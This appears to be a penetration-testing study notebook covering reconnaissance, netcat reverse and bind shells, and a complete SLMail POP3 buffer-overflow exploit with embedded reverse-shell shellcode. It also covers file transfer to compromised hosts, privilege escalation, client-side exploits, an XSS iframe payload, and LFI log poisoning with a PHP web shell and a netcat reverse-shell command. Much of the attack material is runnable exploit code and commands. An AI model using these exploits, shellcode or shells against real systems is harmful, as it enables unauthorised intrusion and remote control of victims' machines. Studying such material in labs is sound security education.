__For education and self study purpose only. Technology is simply a tool, it is the user that defines its morality__ 



### Kali Quick Commands:
1. best way to nagivate and find files in Kali: __updatedb__ then __locate(filename)__. 
2. __which__ searches through directories defined in PATH environment variable
3. service start: __systemctl start (servicename)__. For example, __systemctl start ssh__. 
4. network service check: __netstat -antp__. For example, check SSH: __netstat -antp | grep sshd__. 
5. service auto start at booting: __systemctl enable (servicename)__.
6. HTTP service: __systemctl start apache2__. 

#### Bash Quick Reference: 
__wget (url)__ can be equally achieve in Python via the __httplib__ module. In bash, the chain of command can be pipelined to parse html page: __wget www.cisco.com__. The html page is by default in index.html, so the command is:<br>
__cat index.html | grep "href=" | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u__  <br>
This means to get html page from cisco, find all patterns with string "href" and then use "/" as the delimiter, take the 3rd item in the pattern. This should give us
The results are a list of domain names. the __host__ command can be used to discover IP address given domain name: <br> __for url in \$(cat list.txt)\$; do host \$url; done | grep "has address" | cut -d " " -f 4 | sort -u__ 

Another usage for text processing bash could be to check access log:  <br>
__cat access.log | grep \<IP addr\> | cut -d "\"" -f 2 | uniq -c__  <br>
to find the most frequent IP address, or <br>
__cat access.log | grep \<IP addr\> | grep '/admin' | sort -u __<br>
to check the host that tried to access /admin directory. 

In [ ]:
%%bash 
#!/bin/bash 
# ping sweep for IP range: 10.11.1.0/24
for ip in $(seq 1 254); do 
    ping -c 1 10.11.1.$ip | grep "byte from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done 

In [ ]:
# Python multiprocessing 
import multiprocessing 
import subprocess
import os 

def pinger( job_q, results_q): 
    DEVNULL = open(os.devnull, 'w')
    while True:
        ip = job_q.get() 
        if ip is None: break 
        try:
            subprocess.check_all(['ping', '-c1', ip], stdout=DEVNULL)
            results_q.put(ip)
        except:
            pass 

if __name__ == '__main__':
    pool_size = 255
    jobs = multiprocessing.Queue() 
    results = multiprocessing.Queue()
    pool = [ multiprocessing.Process(target=pinger, args=(jobs,results))
             for i in range(pool_size) ]

    for p in pool:
        p.start()

    for i in range(1,255):
        jobs.put('192.168.1.{0}'.format(i))

    for p in pool:
        jobs.put(None)

    for p in pool:
        p.join()

    while not results.empty():
        ip = results.get()
        print(ip)

### Essential Command line tools 
#### Netcat:
* check if the port is open on IP: __nc -nv (IP_addr) (portno)__
The command will open a connection to the remote IP
* listening on port: __nc -nlvp (portno)__ This will serve as a server. Usually used together with first command 
* Transfering files:  Receiver: __nc -nlvp 4444 > incoming.exe__ . Redirect all inputs to a file called _incoming.exe_. sender: __nc -nv (target_ip) 4444 < (path_to_file).__ The file transfer process is at background and blocking.
* __Bindshell__: scenario: Bob requests Alice to use cmd.exe on his local machine. Bob: __nc -nlvp 4444 -e cmd.exe__. Alice: __nc -nv (Bob's IP) 4444__. This scenario is used because Alice is behind NAT and cannot receive connection from Bob.           
* Get IP on a host: __ifconfig (network card) | grep inet__.
* __Reverse Shell__: Bob requests Alice to send him a command shell. Bob: __nc -nlvp 4444__. Alice: __nc -nv (Bob's IP) 4444 -e /bin/bash__. This is used because Alice cannot forward traffic from the router to her internal machines, so Bob cannot directly get to her. Instead, she must send traffic to Bob. 

#### Ncat 
* Whereas Netcat does not support encryption, Ncat does. Which could aid bypass firewall and intrusion detection.
* __Bindshell__: Bob: __ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl__. This creates a more secure bind shell from Bob's machine that uses ssl. It would also only accept Alice's connection, given by IP 10.0.0.4. Alice would do: __ncat -v 10.0.0.22 4444 --ssl__ and directly connect to Bob, using also ssl.
* __Reverse Shell__: Bob: __ncat --allow 10.0.0.4 -vnl 4444 --ssl__. Alice: __ncat --exec cmd.exe -v 10.0.0.22 4444 --ssl__. 

#### Tcpdump 
* Used to dump .pcap files captured, or conduct real time packet sniffing on network device. __tcpdump -r passwd.pcap__
* Able to be used directly with shell script for document parsing and filtering. __tcpdump -n -r password_cracking_filtered.pcap | cut -d " " -f 3 | sort -u | head__
* Flexible options for src, dst, port. __tcpdump -n src host (IP) -r (file)__. __tcpdump -n dst host (IP) -r (file)__ and __tcpdump -n port (portno) -r (file)__.
* Dump packet in hex format: __tcpdump -nX -r (file.pcap)__ 
* __Advanced Header Filtering__: ![tcp](tcp-hdr.png)For example, to filter only packets that have PSH and ACK flas turned on, deal with the 14th byte of the TCP header. The flags are CEU__AP__RSF on the top, with AP for PSH and ACK, set to one, and all others zero. This gives 00011000, or 24 in decimal. This gives command: __tcpdump -A -n 'tcp[13] = 24' -r passwd.pcap__


## GUI tools 

### Passive Information Gathering 
normally involves __Google Hacking__ and command line tools for Domain name discovery. 
* For example. __site:microsoft.com__ only gives sites with parent domain name microsoft
* __filetype, inurl, intitle__ can also be used. For example, __intitle:"netbotz appliance" "OK" -filetype: pdf__ gives vulnerable netbotz camera sites. 
* More information about Google hacking can be found on __[exploit-db](https://www.exploit-db.com/google-hacking-database/)__
* __Email Harvesting__: Kali specific tool: __theharvester -d cisco.com -b google > google.txt__  searches on Google for email address cisco.com.
* __Whois__: __whois (domainname)__ can be used to do a basic reconnaisance of the target organization. It can also do a reverse lookup with __whois (IP)__.
* __Recon-ng__ is a web reconnaissance framework written in Python. More detail can be found on __[Using Python to spy on your friends](https://www.youtube.com/watch?v=qkUIgl9ASGw)__

### Active Information Gathering
Active Info gathering normally includes __DNS Enumeration, Port Scanning, SMB Enumeration, SMTP, SNMP Enumeration__. 
DNS server interaction: 
* DNS Enumeration: 
    * host command: __host -t ns (domain)__ for ns record and __host -t mx (domain)__ for mail server. One can always use a Brute force guess on domain name and use host to get information. __for ip in \$(seq
155 190);do host 50.7.67.$ip;done |grep -v "not found"__

* __DNS Zone Transfer__: similar to a database replication act between related DNS servers. zone file contains a list of all DNS names configured for that zone. Zone can only be copied from parent to child. DNS transfer are supposed to be limited to authorized child servers, but can be misconfigured. 
    * __host -l (domain name) (dns server address)__ performs a zone transfer. If a zone transfer is successful, a full list of zone files will be dumped. candidate name servers could be: __host -t ns (domain name) | cut -d " " f 4__.

In [ ]:
%%bash 
#!/bin/bash 
# automatic zone transfer 
if [ -z "$1" ]; then 
echo "zone transfer usage: $0 <domain name>"
exit 0
fi 

for server in $(host -t ns $1 | cut -d" " -f 4); do 
# for each name server, attempt a zone transfer 
host -l $1 $server | grep "has address" 
done 

Automatic tools on Kali to deal with DNS enumeartion includes: __[DNSRecon](https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/)__ and __[DNSenum](http://kalilinuxtutorials.com/dnsenum/)__

#### Port Scanning 
port scanning is the process of checking for open TCP and UDP ports on a remote machine. 
* TCP SYN scanning: use the threeway handshake to determine if port is open, using netcat __nc -nvv -w 1 -z (target ip) (target port range)__
* Stealth scan: without completing a TCP handshake, with only SYN packet. if port is open, SYN-ACK should be received. This can deal firewall logging better, which normally deals with complete TCP sessions. But modern firewalls solved it.
* UDP scanning: __nc -nv -u -z -w 1 10.0.0.19 160-162__. If UDP port is open, no reply is sent back; if UDP port is closed, ICMP port unreachable is replied.
    * UDP port scanning is unreliable, since firewalls often drop ICMP, resulting to false positives. 
* Most port scanners scan only the popular ports 
* __Nmap Port scan__: default nmap TCP scan scans the 1000 most popular ports on a given machine, and it generates great amount of network traffic. __nmap -sT -p 1-65535 10.0.0.19__
    * Network sweeping: __nmap -sn 10.11.1.1-254__ (ping sweep). 
    * __nmap -v -sn 10.11.1.1-254 -oG ping-sweep.txt__ records all online hosts 
    * __grep Up ping-sweep.txt | cut -d " " -f  2__
    * Port sweeping: __nmap -p 80 10.11.1.1-254 -oG web-sweep.txt__
    * __grep open web-sweep.txt | cut -d " " -f 2__ 
    * scan top 20 TCP ports: __nmap -sT -A --top-ports=20 10.11.1.1.-254 -oG top-port-sweep.txt__ 
    * OS Fingerprinting: __nmap -O 10.0.0.19__ grabs informatin about the OS for target 
    * Banner Grabbing: __nmap -sV -sT 10.0.0.19__ gives open port and their corresponding services 
    * Nmap Scripting Engine: __NSE__ gives automatic scanning script generation options. __nmap 10.0.0.19 --script smb-os-discovery.nse__ attemps to connect to the SMB service on target and determines its OS version. 
    * DNS zone transfer: __nmap --script=dns-zone-transfer -p 53 (nameserver)__ 

* __SMB Enumeration__: Server Message Block protocol is often vulnerable due to its complexity and open nature. SMB version and Windows: 
    * SMB1: Windows 2000, XP, and Windows 2003 
    * SMB2: Windows Visa and Windows 2008
    * SMB2.1: Windows 7 and Windows 2008 R2
    * SMB3: Windows 8 and Windows 2012 
    * NetBIOS scanning: __nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254__ since SMB NetBIOS listens on TCP port 139, 445 and several UDP port. Or more complecated tool: __nbtscan -r 10.11.1.0/24__ for the whole subnet. 
    * Null Session Enumeration: this refers to unauthenticated NetBIOS session between two computers. tools for use are __[enum4linux](https://tools.kali.org/information-gathering/enum4linux)__, __smbclient, rpcclient, net, nmblookup__. 
    * Nmap SMB NSE scripts: simply use __ls -l /usr/share/nmap/scripts/smb\*__ for all scripts. One example is __nmap -v -p 139, 445, --script=smb-os-discovery 10.11.1.227__. Another __nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=110.11.1.201__ to check vulnerabilities 
    

* __SMTP Enumeration__: VERY commands asks the server to verify an email address, EXPN asks server for membership of a mailing list. 
    * __nc -nv 10.11.1.215 25__ connects to the smtp port of the target. After successful connection, one can use commands such as "VERY root" or "EXPN (email)" 

In [ ]:
# equivalent python script 
import socket 
import sys
if len(sys.argv) != 2:
    print "usage: verfy.py <username>"
    sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('10.11.1.215'. 25))
banner = s.recv(1024)
print("banner is" + banner)
s.send('VRFY' + sys.argv[1] + '\r\n')
result = s.recv(1024)
print result 
s.close() 

* __SNMP Enumeration__: based on UDP, susceptible to IP spoofing and relay attacks. no encryption on version 1,2,and 2c. Weak authentication schemes. 
    * [MIB tree](http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.progcomm/doc/progcomc/mib.htm ) is a database containing information usually related to network management
    * __nmap -sU --open -p 161 10.11.1.1-254 -oG mega-snmp.txt__ scans for open SNMP ports 
    * Another way is to use the communicty string: 
        * __echo public > community__ 
        * __echo private >> community__
        * __echo manager >> community __
        * __for ip in \$(seq 1 254); do echo 10.11.1.$ip; done > ips 
        * __onesixtyone -c community -i ips__ 
    * __Windows SNMP Enumeration: __snmpwalk__ assumes we know the community string, most likely "public". 
        * __snmpwalk -c public -v1 10.11.1.219__ Enumerates the entire MIB tree 
        * __snmpwalk -c public -v1 10.11.1.204 1.3.6.1.4.1.77.1.2.25__ Enumerates Windows user. the string in the end is the community string for windows user 
        * __snmpwalk -c public -v1 10.11.1.204 1.3.6.1.2.1.6.13.1.3__ Enumerates open TCP ports 
        * __snmpwalk -c public -v1 10.11.1.204 1.3.6.1.2.1.25.6.3.1.2__ Enumerates installed softwares 

### Vulnerability Scanning: 
The process of using automated tools to discover and identify vulnerabilities in network. 
* Nmap NSE scan for vulnerability: 
    * __ls -l /usr/share/nmap/scripts/\*vul\*__ to find all vulnerability scanning scripts 
    * an example is __nmap -v -p 80 --script=http-vuln-cve2010-2861 10.11.1.210__. If the server is vulnerable, Nmap can even finish the exploit. 
    * __nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254__ scans for FTP servers that allow anonymous access.
    * __nmap -v -p 139, 445 --script=smb-security-mode 10.11.1.236__ scans for smb security level 
    * __nmap -v -p 80 --script=http-vuln-cve2011-3192 10.11.1.205-210__ checks if software has been patched against certain exploit, here is Apache DoS attack. 
    
* OpenVAS Vulnerability Scanner: 
    * In Kali, first setup using __openvas-setup__ 
    * then __firefox https://127.0.0.1:9392__ as it uses port 9392
    * the GUI page will show up, user can log in with the credential created in first step. It is a GUI, so rather easy to use

### Buffer Overflow
#### Fuzzing 
fuzzing involves sending malformed data into application input and watching for unexpected crashes. This is an exploit on sofware that lacks input validations.<br>
The example uses the _SLMail 5.5.0 Mail Service_ software as the target, which has buffer overflow vulnerability affecting the POP3 __PASS__ command, provided during user login. The software was also not compiled using Data Execution Prevention and Address Space Layout Randomization support, making exploitation simpler.
* __DEP__ is is a set of hardware, and software, technologies that perform additional checks on memory, to help prevent malicious code from running on a system.The primary benefit of DEP is to help prevent code execution from data pages, by raising an exception, when execution occurs.
* __ASLR__ randomizes the base address of loaded applications and DLLs everytime the OS is booted. 


In [ ]:
# talk to POP3 server using python
import socket 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending evil buffer..."     # connect to IP, POP3 port
    s.connect(('10.0.0.22',110))
    data = s.recv(1024)   # receive banner
    print data # print banner
    
    s.send('USER test' + '\r\n')  
    data = s.recv(1024)
    print data
    
    s.send('PASS test\r\n')
    data = s.recv(1024)
    print data
    
    s.close()
    print "\nDone"
except:
    print "Could not connect to POP3"

In [ ]:
# fuzzing 

import socket
# Create an array of buffers, from 1 to 5900, with increments of 200.
buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('10.0.0.22',110))
    s.recv(1024)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()

The idea of fuzzing is to try to send arbitrary length (usually incremental) of string to test if a program that accepts input would crash. With the understanding of function call execution, one can control the ESP/RSP register and execute arbitrary codes. <br>

Sending buffer can be with __Binary Tree Analysis__: instead of sending 2700 As, send 1350 As and 1350 Bs. and check the value of EIP register (whether A or B), continue to do this until EIP is found. This is indeed a binary search on EIP register.  <br>

Another method is to use Unique strings: 
* In Kali, do __locate pattern_create__ 
* Then, __(path to pattern_create) -l 2700__ creates 2700 byte unique string
* An example is __/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700__
* After finding the value of EIP in debugger, use __pattern_offset__ to find the offset of the hex string 
* An example is __ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438__ assuming 39694478 is the value of EIP. 
* Suppose that the result of the previous step gives 2606. This means that beginning from the 2606th byte, we have EIP register. So sending a buffer of __"A" * 2606 + "B" * 4 + "C" * 90__ will store \x42\x42\x42\x42 in EIP register. 
* Shell code coule be included in the buffer, and one can simply change the ESP register to point to the beginning of the shell code.
* Bad character avoidance: One way is to send all possible chars and see which ones are omitted by the program. Usually we have __0x00, 0x0A, 0x0D__. 

In [ ]:
import socket
# testing bad characters for program 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

buffer="A"*2606 + "B"*4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('10.0.0.22',110))
    data = s.recv(1024)
    s.send('USER username' +'\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\nDone!"
except:
    print "Cannot connect to POP3"

#### Execution Flow Control for Buffer Overflow 
the task for a buffer overflow attack is to redirect the execution flow to the shellcode located at the memory address that ESP register points to at crash time. Since the address of ESP register changes often at crash time, we need to make use of __JMP ESP__ instruction in the code (we jump to the code and the code jump to ESP).  <br>
Immunity Debugger's __mona.py__ can be used to the find the memory address of the instruction. Here we still have the resitrction of "no memory protection such as DEP and ASLR" and "memory range has no bad characters". The mona scripts will display all possible modules to use, and we need to choose the ones with all criterions as "FALSE" 
* Find the module (i.e dll file) that satisfies the criterion of non-memory protected and not located at address with bad character.
* From within the module, find the __JMP ESP__ instruction's address. 
* If the program is compiled with DEP, only instruction ins .text should be used. Otherwise we can use any address. 
* use metasploit to find the instruction opcode: __/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb __
* suppose nasm gives the address for jmp esp as: FFE4 
* in Immunity, type: __!mona find -s "\xff\xe4" -m abc.dll__ assuming the module found is abc.dll
* This will give several candidates. Choose the one without bad characters. Suppose the result is __0x5f4a358f__. 
* Therefore the buffer should be: __ "A" * 2606 + "\x8f\x35\x4a\x5f" + Shell_code __, with address in __little endian__. 
* __shellcode generaiton__: __msfvenom -l payloads__ is the general syntax for generating payload with metasploit.
    * __msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c__ is a reverse shell payload. Once executed the command in Kali, the shellcode will appear in the command line.  However, this could generate bad characters.
    * __msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"__ encodes the shell code, as well as get rid of bad characters 0x00, 0x0a, and 0x0d. 
    * Note that host IP and port number are all specified. Different payload has different parameters to specify. 
    * To offset the decoder's behavior at the start of ESP register, we need to add __NOP__, or 0x90 , at the start of the shell code. 


In [ ]:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = ("\xba\xde\xea\x23\x34\xda\xce\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x52\x31\x57\x12\x03\x57\x12\x83\x31\x16\xc1\xc1\x31\x0f\x84"
"\x2a\xc9\xd0\xe9\xa3\x2c\xe1\x29\xd7\x25\x52\x9a\x93\x6b\x5f"
"\x51\xf1\x9f\xd4\x17\xde\x90\x5d\x9d\x38\x9f\x5e\x8e\x79\xbe"
"\xdc\xcd\xad\x60\xdc\x1d\xa0\x61\x19\x43\x49\x33\xf2\x0f\xfc"
"\xa3\x77\x45\x3d\x48\xcb\x4b\x45\xad\x9c\x6a\x64\x60\x96\x34"
"\xa6\x83\x7b\x4d\xef\x9b\x98\x68\xb9\x10\x6a\x06\x38\xf0\xa2"
"\xe7\x97\x3d\x0b\x1a\xe9\x7a\xac\xc5\x9c\x72\xce\x78\xa7\x41"
"\xac\xa6\x22\x51\x16\x2c\x94\xbd\xa6\xe1\x43\x36\xa4\x4e\x07"
"\x10\xa9\x51\xc4\x2b\xd5\xda\xeb\xfb\x5f\x98\xcf\xdf\x04\x7a"
"\x71\x46\xe1\x2d\x8e\x98\x4a\x91\x2a\xd3\x67\xc6\x46\xbe\xef"
"\x2b\x6b\x40\xf0\x23\xfc\x33\xc2\xec\x56\xdb\x6e\x64\x71\x1c"
"\x90\x5f\xc5\xb2\x6f\x60\x36\x9b\xab\x34\x66\xb3\x1a\x35\xed"
"\x43\xa2\xe0\xa2\x13\x0c\x5b\x03\xc3\xec\x0b\xeb\x09\xe3\x74"
"\x0b\x32\x29\x1d\xa6\xc9\xba\x28\x37\xd1\x3e\x45\x35\xd1\x3f"
"\x2e\xb0\x37\x55\x40\x95\xe0\xc2\xf9\xbc\x7a\x72\x05\x6b\x07"
"\xb4\x8d\x98\xf8\x7b\x66\xd4\xea\xec\x86\xa3\x50\xba\x99\x19"
"\xfc\x20\x0b\xc6\xfc\x2f\x30\x51\xab\x78\x86\xa8\x39\x95\xb1"
"\x02\x5f\x64\x27\x6c\xdb\xb3\x94\x73\xe2\x36\xa0\x57\xf4\x8e"
"\x29\xdc\xa0\x5e\x7c\x8a\x1e\x19\xd6\x7c\xc8\xf3\x85\xd6\x9c"
"\x82\xe5\xe8\xda\x8a\x23\x9f\x02\x3a\x9a\xe6\x3d\xf3\x4a\xef"
"\x46\xe9\xea\x10\x9d\xa9\x1b\x5b\xbf\x98\xb3\x02\x2a\x99\xd9"
"\xb4\x81\xde\xe7\x36\x23\x9f\x13\x26\x46\x9a\x58\xe0\xbb\xd6"
"\xf1\x85\xbb\x45\xf1\x8f")

buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
try:
    print "\nSending evil buffer..."
    s.connect(('10.0.0.22',110))
    data = s.recv(1024)
    s.send('USER username' +'\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    s.close()
    print "\ Done. Did you get a reverse shell?"
    
except:
    print "Could not connect to POP3!"

Now, the attacker can set __nc -nlvp 443__ on local machine and listen after sending the buffer. If successful, a reverse shell should spawn on attacker's machine. <br>

The above execution will crash the program. However, if the program is multithreaded, we can just terminate the thread without crashing the whole program. The service could still continue in this case. This is simply achieved via msfvenom's ExitThread method: __msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d" __ to generate the shell code. 

### Linux Based Buffer Overflow

### Working with Exploits 
There are lots of fake exploits online, someone with malicious intent for anyone using it. (i.e. one should examine the payload and whether root access is required before using an exploit). Two sources for exploit are generally trusted, one is __Exploit Database__ and the other __SecurityFocus__.

* In Kali, simply use __searchsploit (exploit keyword)__ to find relevant exploit in the offline version of Exploit database.
* Or online, simply go to either website to get exploit 

Or better, we can modify the exploits that do not work.

* Never run exploits without examining them first 
* Creating a testing environment to make sure that the exploit works 
* Checklist included, but are not limited to: 
    * shell code swapping 
    * environment setup (compiler, i.e. gcc or mingw) 
    * return address 
    * hardcoded IP/DNS/etc.. 
    * necessity of root privilege 

### File Transfer to Target Machine 

__post exploitation__ refers to the action after a successful exploit (i.e. spawning a reverse shell), usually including privilege escalation, installing backdoors, cleaning up evidence and so on. File transfer usually include compiled exploit binaries, command line port scanners, backdoors, and password dumpers. <br>
Linux usually have __netcat, curl, wget__ preinstalled, but Windows does not have them. So attackers normally need to 'land' some files into the target windows machine. This is usually completed with non-interactive connections. 

* TFTP service: TFTP is a UDP based file transfer protocol and is often resitrcted by corporate egress firewall rules. Windows OS up to Windows XP and 2003 contain TFTP client. But in version above, it need to be explicitly added during installation. 
    * in Kali Linux: __mkdir /tftp__;  __atftpd --daemon --port 69 /tftp__ ; __cp /usr/share/windows-binaries/nc.exe /etftp__ . These operations make it ready for tftp to upload the netcat executable.
    * on Windows, simply use __tftp -i 10.11.0.5 get nc.exe__ to get the netcat executable. 


* FTP service: by default FTP is interactive, and it can be non-interactive if given a text file of inputs. 
    * on Kali, __apt-get update && apt-get install pure-ftpd__ 

In [ ]:
%%bash 
# bash script for setting up ftp 
#!/bin/bash

groupadd ftpgroup 
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd sec -u ftpuser -d /ftphome 
pure-pw mkdb 
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

then __chmod 755 setup-ftp__  and __./setup-ftp__. Once run, user enters password and it is configured.
We can then begin to generate the text file __on remote target (windows)__ required to make the service non-interactive: 
* echo open (attacker IP) 21 > ftp.txt
* echo USER (attacker name) >> ftp.txt
* echo ftp >> ftp.txt
* echo bin >> ftp.txt
* echo GET nc.exe >> ftp.txt
* echo bye >> ftp.txt
after the setup, simply do __ftp -v -n -s:ftp.txt__ on the target machine. 

__Uploading files with scripts__ : with Powershell, VBScript, or even python on target machine. Attacker can issue HTTP download from target machine to a web server on local machine. 

* __Using debug.exe__ : The idea is to use echo to write out binary file in its hex value equivalent and then use debug.exe to assemble the written text file into a binary file. There is 64K byte size limit to the file debug.exe can generate. Normally __upx__ is used to compress the executable. The method normally works with smaller size applications 
    * on Kali, __upx -9 nc.exe__ 
    * on Windows, rebuild the file in text. with __exe2bat__ 
        * on Kali, __locate exe2bat__; then __wine exe2bat.exe nc.exe nc.txt__. This gives us a txt file representin the binary file. 
        * Open the created file on Kali, and copy and paste the content from Kali to Windows machine. Every content in the text file should be a echo command, making it non-interactive. 
        * After the copy pasting, on Windows, issue commands to convert txt file back to executable 

### Privilege Escalation 

* __Running exploits locally__: usually the term refers to running the exploit locally, or __local privilege escalation__. An example would be that once you gained access to reverse shell on Ubuntu 11.10 32 bit machine that has not been patched against CVE 2012-0056, simply use wget to fetch the exploit, compile it, and execute. Since most exploits need to be compiled locally, the run-time environment needs to be set up. On Windows, for example, __pyinstaller.py__ module from PyWin32 can be used to create stand-alone windows executables from python scripts, with __python pyinstaller.py --onefile ms11-080.py__. 

* __Configuration Issues__: __icacls__ windows utility checks insecure permissions. usage: __icacls (file.exe)__. If the attacker can have the permission to modify the file, it can simply replace it will a malicious file that performs privilege escalation. (i.e. a Admin privileged file can be rewritten to make low privileged user run at admin level upon system reboot)


### Client Side Attack 

client side attack attacks client side software such as browsers. IN client side attack, the target's machine does not have to be routable from attacker's. Due to the wide attack surface clients (numerous) and their softwares (large number of), it is very difficult for the admin to monitor all of them.  <br>
Unlike server side attack, which uses common protocols, in client side attack, port scanning is generally not enough, and information gathering is again required. 
* passive info gathering: use search engine for corporate IP and find sites with agent data. 
* Active info gathering: direct contact with the client; phishing or social engineering involved tasks.

__MS12-037-Internet Explorer 8 Fixed Col Span ID__ is a security vulnerability of IE. Modify the exploit can yeild desired rsults. 
* __cd /var/www/html/__
* __wget -O exploit.html http://www.exploit-db.com/download/24017__
* __service apache2 start__ 
This sets up the exploit on attacker's apache server. Then simply we need the target to use browser to go to the apache server. Once done, a bind shell will appear on the target's machine. <br>
To make it reverse shell, we need to modify the exploit by swapping out the shellcode:
* __msfveom -p windows/shell_reverse_tcp LHOST=(localhost) LPORT=(localport) -f js_le -e generic/none__ creates the shell code.
* If the shellcode is smaller in size than the original shellcode, add NOP to padding. (i.e. 18 bytes difference requires 18 /x99 at the end of shell code.  

__JAVA signed Applet Attack__ is an attack that requires victim interaction. This is used more often since client software could be patched, and human vulnerability is often easier to exploit. The exploit assumes that the target has Java installed and enabled in their browsers. The attacker needs to compile Java program and sign the Applet. Then it shoule be embedded in an HTML file and write it to web root folder. More can be seen [here](https://pentestlab.blog/2012/03/03/java-applet-attack-method/) The user has to disregard the warning message to be tricked into the Java Applet attack.


### Web Application Attack 

Two modules for Web application attack on Firefox: __Cookie Manager+__ and __Tamper Data__. <br>

__XSS (Cross Site Scripting)__ are caused due to unsanitized user input that is then displayed on a web page in HTML format. These vulnerabilities allow malicious attackres to inject client side scripts (i.e. Javascript) into web pages viewed by other users. When the victim browse the website, these scripts can execute on the victim's browser, and it usually can steal credentials and cookies, or redirect victim's browser to a malicious HTML page. <br>
1. Browser Redirection and IFRAME Injection: __\<iframe SRC="http://10.11.0.79/report" height= "0" width="0">\</iframe>__ as example html code to redirect from the inline frame, assuming attacker's IP is 10.11.0.79. The attacker can then simply listen on __nc -nlvp 80__. 
2. Cookie stealing and session tampering: Once a legitimate user logs into the application, a cookie that contains a PHP session ID is added to their session. Any further attempts to access this page by the authenticated user does not reuire re-authentication. In vulnerable session implementations, one can use javascript to have the victim's browser send us the cookie information stored for this session.

__File Inclusion Vulnerabilities__, including Local (LFI) and remote (RFI) are commonly found in poorly written PHP code. It allows attacker to include a remote or local file into the webserver's running PHP code. RFI allows attacker to introduce its own code to webserver, whereas LFI makes use of files already existing on the web server. 
* __Local File Inclusion__: directly in the browser: when the PHP script stores file locally (variable). For example, the php _include_ function. In browser, a url query could contain the values for parameters. For example, to set the value for LANG variable. 
In theory, this vulnerability allows the attacker to browse the whole file system of the target machine.Sometimes the URL request would need to specify null byte %00 at the end. Sometimes not. When source code is unknown, attacker should try both. <br>
Since the PHP include function can execute any php code in the included file, we can potentially achieve arbitrary code execution from the file included. This would involve contaminating the log file of the target machine.<br>

* One way to achieve this is to type PHP code into an open connection with the target machine. Usually the system log file will capture the message been transmitted in a dedicated access log file.
* Attacker can then access the contaminated log file from browser and execute the log file. 
* For example, the code could be <?php echo shell_exec(\$_GET['cmd']);?>

The attacker can then append string such as __&cmd=ipconfig__ before the logfile and exeute the cmd. For a reverse shell (for example, netcat), the command should be: __cmd=nc%20-nv%20(LHOST)%20(LPORT)%20-e%20cmd.exe__. %20 in URL (unicode) represents space. Necat also need to be transferred first: __cmd=nc%20-nv%2010.11.0.55%get%20nc.exe__ after the netcat file is ready to transmit in /tftp 

